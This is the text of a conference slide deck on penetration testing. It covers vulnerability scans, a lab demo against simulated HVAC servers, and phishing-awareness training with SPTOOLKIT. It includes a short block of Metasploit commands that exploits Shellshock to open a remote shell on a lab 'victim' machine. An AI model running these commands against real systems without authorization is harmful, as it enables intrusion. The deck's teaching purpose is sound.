ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK Presenter: Robbie Corley Robbie.Corley@KCTCS.EDU Organization: KCTCS Senior Information Security Analyst ABOUT ME Personal Life / Interests • Married • Bachelor’s in Music Business??? • Favorite Show: Seinfeld • Favorite Movie(s): Lord of the Rings / Hobbit Trilogy • Favorite Aspects of IT Security: • Reverse Engineering / Studying Shellcode • Finding and Exploiting Software Vulnerabilties LET’S TALK ABOUT PENTESTING What is a pentest? • A pentest is a simulated attack against a system to prove or disprove the existence of vulnerabilities previously detected by a vulnerability scan. How does it work? • You are the attacker: • You will use exploits custom tailored to target specific flagged vulnerabilities from your previous vulnerability scan LET’S TALK ABOUT PENTESTING Some history on Pentesting… • Pentesting originally required manually compiling each individual exploit to test a vulnerability, all of which were usually coded in different programming languages and specific to OS builds (XP sp1, XP sp2, etc) What’s the advantage over a Vulnerability Scan and why conduct one? • A Vulnerability Scan merely lays out the foundation for your network risk assessment • A Pentest helps you fortify your network by discovering and patching security holes before the attackers do and keeps your auditors happy, which also keeps your boss happy • Pentesting “weeds out” false positives from a Vulnerability Scan while also validating vulnerabilities CONDUCTING YOUR FIRST PENTEST • Our Goal: To Scan and Validate vulnerabilities in a simulated environment to demonstrate the effectiveness of a Pentest • Recommended Vendor: Rapid7 (Approved PCI scan vendor an added plus) • Other recommendations: Tenable Nessus • Open Source: OpenVAS • Why Rapid7? • Exploits are pre-compiled and you do not need to go online to search for them. Readily available, built into the software • Scanner and Pentesting software both free to try • Software Resources Used: • Nexpose Vulnerability Scan Solution • Metasploit Pentesting Solution HVAC SYSTEM SCAN & PENTEST SIMULATION • Breakdown: Your boss has requested a blind vulnerability/pentest assessment for your HVAC network • Attack Vectors used: Client Side and Web • A Blind Scan? • A blind scan/pentest is when you scan/pentest a network without using known credentials. This helps to mimic a realistic cyber attack scenario •HVAC Network Layout: • HVAC A: Windows XP for server HVAC software: • 192.168.56.101 • HVAC B: Linux Web Server for HVAC Web Services • 192.168.56.102 HVAC SERVER A: SCAN SIMULATION Vulnerability Scan Results using HVAC A: IP: 192.168.56.101 OS: Windows XP HVAC CONSOLE SERVER HVAC SERVER A: PENTEST SIMULATION Pentest Live Demo using HVAC A: IP: 192.168.56.101 OS: Windows XP HVAC CONSOLE SERVER HVAC SERVER B: SCAN SIMULATION Vulnerability Scan Results using HVAC B: IP: 192.168.56.102 OS: Linux HVAC WEB SERVER Shellshock!!!!!! HVAC SERVER B: PENTEST SIMULATION Pentest Live Demo using HVAC B: IP: 192.168.56.102 OS: Linux HVAC WEB SERVER PENTEST SHELL COMMANDS USED Commands used for future reference: To pull up web console, type : Alt +Tilde “~”, then… • “use exploit/multi/http/apache_mod_cgi_bash_env_exec” • “set RHOST 192.168.56.102” (our victim box ip address) • “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script) • “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module) • “run” Once in the compromised victim’s machine session, you can open a shell by simply typing “shell”. You will then be greeted with a linux shell USER AWARENESS TRAINING PENTESTING USING SOCIAL ENGINEERING MODULES • Why have User Awareness Training? • Users can be more mindful of simple operations that can effectively help keep their documents and data safe • We simply cannot monitor all of our users’ actions • Hacker’s are keen on well structured network security, and seek out easier pathways of entry, i.e.: A phishing email directed to an unsuspecting, un-training user • On a personal note: Training gives our users a boost of confidence, knowing they are collectively making a difference in keeping themselves and the company more secure USER AWARENESS TRAINING PENTESTING USING SOCIAL ENGINEERING PHISHING MODULES • How does it work? • Phishing Modules use pre-made email templates that resemble common Phishing emails in the wild • Emails can be tailored to re-direct users to informative phishing awareness videos upon the user interacting with a phishing email • What tools do I need? • Easiest solution and what we will be using: SPTOOLKIT • SPTOOLKIT is Opensource and requires little effort to setup • Rapid7’s Metasploit Pentesting Software also includes a Social Engineering module with a pro license USER AWARENESS TRAINING PHISHING AROUND WITH SPTOOLKIT • Demo time! • Link: https://github.com/sptoolkit/sptoolkit • Requirements: • SMTP server • Any Linux OS box with Apache and MySQL installed • Recommended approach: Install Kali Linux which has Apache and MySql installed and enabled by default • http://www.kali.org/downloads/ • Commands to start MYSQL and Apache: • Service apache2 start • Service mysql start USER AWARENESS TRAINING PHISHING AROUND WITH SPTOOLKIT THAT’S ALL FOLKS This presentation and its supplemental video and software content can be downloaded by using the following link: http://tinyurl.com/l46flvo (Secure Google-Drive repository) Links to Resources outside of this repository: SPTOOLKIT Setup Guide: http://www.dafthack.com/blog/howtospearphishyouremployeespart1thesetup www.rapid7.com -> download Community edition of Metasploit and Nexpose http://www.kali.org/downloads/ -> Kali Linux to be used as a pentesting environment and for SPTOOLKIT Social Engineering Module Want to chat with me outside of this conference about more IT Security topics? Shoot me an email at: Robbie.Corley@kctcs.edu QUESTIONS???